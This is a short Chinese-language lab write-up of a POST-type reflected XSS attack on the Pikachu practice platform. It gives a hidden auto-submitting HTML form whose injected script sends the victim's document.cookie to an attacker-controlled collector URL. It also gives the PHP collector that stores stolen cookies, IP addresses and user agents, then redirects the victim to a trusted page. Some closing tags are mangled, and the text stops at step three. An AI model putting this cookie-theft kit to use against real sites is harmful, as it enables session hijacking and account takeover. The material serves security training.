【xss漏洞】post型cookie获取与利用实验

一、套壳伪造网址：

      ***使用样式visibility:hidden隐藏表单视图

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
script>

head>
<body>
<form style='visibility:hidden' method="post" action="http://192.168.88.128/pikachu/vul/xss/xsspost/xss_reflected_post.php">

    <script>
document.location = 'http://192.168.88.128/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	script>"
	 />
	 
    <input id="postsubmit" type="submit" name="submit" value="submit" />
form>
body>
html>

二、攻击方获取cookie后处理脚本：

include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFERER'];
    $useragent=$_SERVER['HTTP_USER_AGENT'];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values('$time','$ipaddress','$cookie','$referer','$useragent')";
    $result=mysqli_query($link, $query);
}
header("Location:http://192.168.88.128/pikachu/index.php");//重定向到一个可信的网站

?>

三、攻击方登陆攻击后台查看：